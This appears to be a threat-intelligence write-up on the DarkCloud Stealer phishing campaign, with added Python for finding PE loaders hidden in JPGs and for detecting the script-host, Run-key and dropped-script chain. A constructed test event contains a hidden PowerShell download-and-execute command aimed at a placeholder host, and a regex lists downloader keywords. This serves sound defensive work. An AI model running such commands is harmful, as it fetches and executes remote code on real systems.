DarkCloud Stealer Targets Financial Institutions with Weaponized RAR Attachments

DarkCloud Stealer is an information-stealing malware family that is currently being delivered to financial institutions through phishing e-mails carrying weaponized RAR attachments. Once a workstation is compromised, it harvests stored credentials and other sensitive data and sends them to attacker-controlled infrastructure.

Infection Mechanism

The attack begins when a recipient opens a seemingly legitimate RAR archive, often given an enticing name such as Proof of Payment.rar. Inside is a VBE script (an encoded VBScript file) which, when opened, runs under the Windows Script Host and launches a PowerShell downloader. That downloader fetches an image file, typically a JPG, whose contents hide the malware's loader.

The PowerShell script scans the image's raw bytes for a specific BMP header pattern that marks where a .NET DLL loader is embedded in the pixel data, extracts the DLL, and loads it directly in memory. Because the DLL never lands on disk as a separate file, file-based antivirus scanning of the download sees only an image.
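The extraction step is worth being able to replicate defensively. The Python below is an added example, not code from the article or from the malware. Rather than searching for the loader's specific BMP header pattern (which the article does not reproduce), it walks a downloaded file for any structurally valid PE header and reports whether the embedded module is a DLL and carries a .NET CLR header, which is what a .NET loader hidden in a JPG looks like to a triage script. The sample "image" it runs on is constructed inline: JPEG markers, filler containing a stray "MZ", an assumed "BM" marker, and a minimal PE32 DLL header with no real code.

```python
import struct
from typing import Dict, List, Optional

JPEG_MAGIC = b"\xff\xd8\xff"        # SOI marker every JPEG starts with
PE_SIGNATURE = b"PE\x00\x00"
IMAGE_FILE_DLL = 0x2000
CLR_DIRECTORY_INDEX = 14            # IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR: non-zero => .NET assembly


def is_jpeg(data: bytes) -> bool:
    return data.startswith(JPEG_MAGIC)


def parse_pe_at(data: bytes, mz_off: int) -> Optional[Dict]:
    """Validate a DOS header + NT headers at mz_off; return key fields or None."""
    if mz_off + 0x40 > len(data):
        return None
    e_lfanew = struct.unpack_from("<I", data, mz_off + 0x3C)[0]
    pe_off = mz_off + e_lfanew
    # Genuine headers keep e_lfanew small; a random "MZ" inside pixel data almost
    # never points at a valid PE\0\0 signature, which is what filters false hits.
    if not (0x40 <= e_lfanew <= 0x400) or data[pe_off:pe_off + 4] != PE_SIGNATURE:
        return None
    opt_off = pe_off + 24                      # optional header follows the 20-byte COFF header
    if opt_off + 2 > len(data):
        return None
    machine, nsections = struct.unpack_from("<HH", data, pe_off + 4)
    characteristics = struct.unpack_from("<H", data, pe_off + 22)[0]
    opt_magic = struct.unpack_from("<H", data, opt_off)[0]
    if opt_magic == 0x10B:                     # PE32: data directories at +96
        dd_base = opt_off + 96
    elif opt_magic == 0x20B:                   # PE32+: data directories at +112
        dd_base = opt_off + 112
    else:
        return None
    clr_entry = dd_base + CLR_DIRECTORY_INDEX * 8
    if clr_entry + 8 > len(data):
        return None
    clr_rva, clr_size = struct.unpack_from("<II", data, clr_entry)
    return {
        "offset": mz_off,
        "machine": machine,
        "sections": nsections,
        "is_dll": bool(characteristics & IMAGE_FILE_DLL),
        "is_dotnet": clr_rva != 0 and clr_size != 0,
    }


def find_embedded_pe(data: bytes) -> List[Dict]:
    """Every offset in data where a structurally valid PE image begins."""
    hits = []
    pos = data.find(b"MZ")
    while pos != -1:
        parsed = parse_pe_at(data, pos)
        if parsed:
            hits.append(parsed)
        pos = data.find(b"MZ", pos + 1)
    return hits


def triage(data: bytes) -> Dict:
    """Verdict for a downloaded 'image': a JPEG that contains a PE is a loader carrier."""
    hits = find_embedded_pe(data)
    return {
        "claims_jpeg": is_jpeg(data),
        "embedded_pe": hits,
        "suspicious": is_jpeg(data) and len(hits) > 0,
    }


# ---- constructed sample, not a real DarkCloud artifact ---------------------
def _fake_dotnet_dll() -> bytes:
    """Minimal PE32 DLL headers with a CLR directory set; contains no real code."""
    dos = bytearray(0x40)
    dos[0:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)          # e_lfanew: NT headers right after DOS header
    coff = struct.pack("<HHIIIHH", 0x014C, 2, 0, 0, 0, 224, 0x2102)  # i386, 2 sections, DLL
    opt = bytearray(224)
    struct.pack_into("<H", opt, 0, 0x10B)            # PE32 magic
    struct.pack_into("<II", opt, 96 + CLR_DIRECTORY_INDEX * 8, 0x2008, 0x48)  # CLR header RVA/size
    return bytes(dos) + PE_SIGNATURE + coff + bytes(opt)


def build_sample() -> bytes:
    """JPEG header, filler with a stray 'MZ', an assumed 'BM' marker, then the DLL, then EOI."""
    filler = b"\x00" * 100 + b"MZ" + b"\x00" * 198     # stray MZ with no valid PE behind it
    return JPEG_MAGIC + b"\xe0\x00\x10JFIF\x00" + filler + b"BM" + _fake_dotnet_dll() + b"\xff\xd9"


SAMPLE_CARRIER = build_sample()
SAMPLE_CLEAN = JPEG_MAGIC + b"\xe0\x00\x10JFIF\x00" + b"\x00" * 300 + b"\xff\xd9"

if __name__ == "__main__":
    print(triage(SAMPLE_CARRIER))
    print(triage(SAMPLE_CLEAN))
```

To run it against a real download, pass `open(path, "rb").read()` to `triage()`. The e_lfanew range check is what keeps the scan quiet on ordinary photos: the two-byte "MZ" sequence occurs often enough in compressed pixel data, but it is never followed by a pointer to a valid "PE\0\0" signature by accident.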

Establishing Persistence and Data Exfiltration

Once running, DarkCloud Stealer establishes persistence through the Windows Run registry key: it drops a JavaScript payload under a deceptive filename such as M3hd0pf.exe, chosen to look like a legitimate system binary such as MSBuild.exe, and registers it under Run so that it is executed at every user logon.

The stealer uses process hollowing to run its code inside legitimate host processes, including MSBuild.exe and mtstocom.exe, so that credential theft appears to originate from trusted binaries. From within those hosts it reads saved credentials from browser databases, notably Chrome's Login Data SQLite file. Endpoint detection telemetry has recorded attempts to decrypt the stored passwords in memory, which is the point at which the theft becomes observable to behavioral sensors.

The harvested data is staged in user directories and then transmitted over FTP and HTTP to clusters of frequently changing domains, often under inexpensive top-level domains such as .shop and .xyz. The rapid domain rotation makes static indicator blocking short-lived, and the use of ordinary HTTP lets the exfiltration resemble routine web traffic, which complicates network-based detection.

Recommendations for Financial Institutions

To mitigate the risks posed by DarkCloud Stealer, financial institutions are advised to implement the following measures:

– Monitor for Anomalous Script Execution: Alert on wscript.exe or cscript.exe running VBE/VBS files from user directories, and in particular on a script host spawning PowerShell, which is the chain this campaign uses.

– Inspect Registry Modifications: Watch for new or changed values under the Windows Run registry key, especially entries that launch scripts or point to files in user-writable locations such as Public, Downloads, AppData or Temp rather than to known, legitimately installed applications.

– Scrutinize Downloaded JavaScript Files: Treat JavaScript files appearing in public download folders as suspect, since this campaign uses them as its persistence payload.
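The three checks above, plus the script-host-to-PowerShell chain from the infection section, can be written as detection rules. The Python below is an added illustration, not code from the article or from any vendor product. It runs over constructed Sysmon-style events (event ID 1 process creation, 13 registry value set, 11 file create) that were made up to resemble the described chain; the JSON field names, paths, user names and the example.invalid URL are assumptions, and the severity labels are my own.

```python
import json
import re
from typing import Dict, List, Optional

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
RUN_KEY = re.compile(r"\\CurrentVersion\\Run\\", re.IGNORECASE)
USER_WRITABLE = re.compile(r"\\(AppData|Temp|Users\\Public|Downloads)\\", re.IGNORECASE)
SCRIPT_EXT = re.compile(r"\.(js|jse|vbe|vbs)\b", re.IGNORECASE)
DOWNLOADER_HINTS = re.compile(
    r"(downloadstring|downloadfile|invoke-webrequest|\biwr\b|-enc|frombase64string)", re.IGNORECASE
)


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def rule_script_host(ev: Dict) -> Optional[Dict]:
    """Event 1: a script host running VBE/VBS/JS, or a script host spawning PowerShell."""
    if ev.get("event_id") != 1:
        return None
    image, parent = basename(ev.get("image", "")), basename(ev.get("parent_image", ""))
    cmd = ev.get("command_line", "")
    if parent in SCRIPT_HOSTS and image == "powershell.exe":
        sev = "high" if DOWNLOADER_HINTS.search(cmd) else "medium"
        return {"rule": "script host spawned PowerShell", "severity": sev, "evidence": cmd}
    if image in SCRIPT_HOSTS and SCRIPT_EXT.search(cmd):
        return {"rule": "script host executing VBE/VBS/JS", "severity": "medium", "evidence": cmd}
    return None


def rule_run_key(ev: Dict) -> Optional[Dict]:
    """Event 13: a Run key value that launches a script or something in a user-writable path."""
    if ev.get("event_id") != 13 or not RUN_KEY.search(ev.get("target_object", "")):
        return None
    details = ev.get("details", "")
    tokens = details.split()
    launcher = basename(tokens[0]) if tokens else ""
    reasons = []
    if USER_WRITABLE.search(details):
        reasons.append("launches from user-writable path")
    if launcher in SCRIPT_HOSTS or SCRIPT_EXT.search(details):
        reasons.append("runs a script")
    if not reasons:
        return None
    evidence = f"{ev['target_object']} = {details} ({'; '.join(reasons)})"
    return {"rule": "suspicious Run key entry", "severity": "high", "evidence": evidence}


def rule_dropped_script(ev: Dict) -> Optional[Dict]:
    """Event 11: a script file created under Public, Downloads, AppData or Temp."""
    if ev.get("event_id") != 11:
        return None
    path = ev.get("target_filename", "")
    if SCRIPT_EXT.search(path) and USER_WRITABLE.search(path):
        return {"rule": "script dropped in user-writable folder", "severity": "medium", "evidence": path}
    return None


RULES = (rule_script_host, rule_run_key, rule_dropped_script)


def analyze(jsonl: str) -> List[Dict]:
    """Apply every rule to every event (one JSON object per line); return all findings."""
    findings = []
    for n, line in enumerate(jsonl.strip().splitlines(), start=1):
        ev = json.loads(line)
        for rule in RULES:
            hit = rule(ev)
            if hit:
                findings.append({"line": n, **hit})
    return findings


# Constructed events; not real telemetry from any incident.
SAMPLE_EVENTS = r"""
{"event_id": 1, "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "parent_image": "C:\\Windows\\System32\\wscript.exe", "command_line": "powershell -w hidden -c IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/logo.jpg')"}
{"event_id": 1, "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "parent_image": "C:\\Windows\\explorer.exe", "command_line": "powershell Get-Date"}
{"event_id": 13, "target_object": "HKU\\S-1-5-21-1111\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Updater", "details": "wscript.exe C:\\Users\\Public\\Downloads\\update.js"}
{"event_id": 13, "target_object": "HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\OneDrive", "details": "C:\\Program Files\\Microsoft OneDrive\\OneDrive.exe /background"}
{"event_id": 11, "target_filename": "C:\\Users\\Public\\Downloads\\invoice.js"}
{"event_id": 11, "target_filename": "C:\\Users\\alice\\Documents\\report.docx"}
{"event_id": 1, "image": "C:\\Windows\\System32\\wscript.exe", "parent_image": "C:\\Windows\\explorer.exe", "command_line": "wscript.exe \"C:\\Users\\alice\\Downloads\\Proof of Payment\\payment.vbe\""}
"""


def run_sample() -> List[Dict]:
    return analyze(SAMPLE_EVENTS)


if __name__ == "__main__":
    for f in run_sample():
        print(f"[{f['severity']}] line {f['line']}: {f['rule']} -> {f['evidence']}")
```

Of the seven constructed events, four should fire: the script-host-to-PowerShell download chain, the Run key entry that runs a script from Public, the JavaScript file dropped into Public\Downloads, and wscript.exe opening a .vbe from a user's Downloads folder. The PowerShell launched by explorer.exe, the OneDrive Run entry and the .docx file create stay quiet, which is the baseline any such rule set must hold on a real fleet before the alerts are worth routing to analysts.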

By adopting these proactive monitoring strategies, organizations can enhance their ability to detect and neutralize threats like DarkCloud Stealer before significant damage occurs.